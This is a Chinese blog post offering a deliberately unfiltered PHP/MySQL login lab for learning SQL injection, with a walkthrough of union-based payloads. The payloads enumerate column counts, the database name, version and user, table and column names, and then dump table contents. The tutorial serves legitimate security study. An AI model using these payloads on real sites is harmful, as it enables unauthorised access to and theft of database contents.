环境要求:php+mysql

前端框架:Boostrap

当前版本:V1.0

本次发布的是PHP+MYSQL版本,基于Boostrap写[防采集6ns.net]的一个登录界面(抄袭来的,其实我并不精通前端^.^).

index.php为POST请求,get.php为get请求.

如何安装?

百度下载PHP一键环境,然后把解压包解压到网站根目录,打开数据库导入SQL文件.

如果数据库账号密码不是ROOT,用notepad以UTF8无BOM方式打开index.php,修改以下内容.

$db_host = "127.0.0.1"; //数据库地址
$db_user = "root"; //数据库账号
$db_pass = "root";//数据库密码

访问http://localhost/index.php(最好使用POST,因为表单有记录可以查)就可以开始学习和测试了,

这是什么玩意?

主要是为了学习SQL防注入的,使用此工具可以模拟测试生成的SQL语句,此工具没有添加任何过滤(包括空格),如果需要添加过滤,可以改成这样.

//表单简单获取
@$user = $_POST['user'];
@$pass = $_POST['pass'];

//过滤空格
/*
$user = trim($_POST['user'];
$pass = trim($_POST['pass'];
*/

//添加过滤器
function get_str($str){
	$str = '各种过滤';
	return $str;
}
$user = get_str($user);
$pass = get_str($pass);

下面就做个演示吧

先猜字段有多少个

' order by 3#

如果输入' order by 4#就会出现错误

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in H:\phpStudy\WWW\index.php on line 42

因为字段数量只有3个,所以会出错.知道字段数量以后,可以获取其他的敏感信息,例如数据库名,版本号,数据库用户名.

' union select database(),version(),user()#

查询表名

'union select  group_concat('post'),2,3 from information_schema.tables where table_schema='6ns_net_test'#

有了表名,就可以查询字段了.

'union select group_concat('settings'),2,3 from information_schema.columns where table_name='post'#

这里出现了6个settings,就代表着有6个字段,接下来输出内容.

'union select settings,2,3 from post #

还可以这样,

'union select handle,settings,params,advanced from post #

&nb[防采集]sp;

本地下载:本地下载 V1.0版 本地下载 V1.1版

版本更新

后续要更新的内容

  • 用EXE生成相关代码,可以开启关闭某个特定功能.
  • post和get合并成一体

V1.1

  1. 修复了没有注释过滤函数导致的错误.
  2. 重新整理了目录结构,不会用到的页面移到了二级目录.
  3. 精简了index.php和get.php的主要文件,代码加起来没那么眼花缭乱了.
  4. 增加了表单显示功能,在index.php和get.php里面将$show = true即可开启.
  5. 增加了过滤函数,可以过滤大量SQL,可适当注释某个部分进行测试.

V1.0 初始版本

Spectre

About the author: 被一个人指责,说明你做的不够好。被一堆人指责,说明你已经成功了。

发表评论

电子邮件地址不会被公开。

3 × 3 =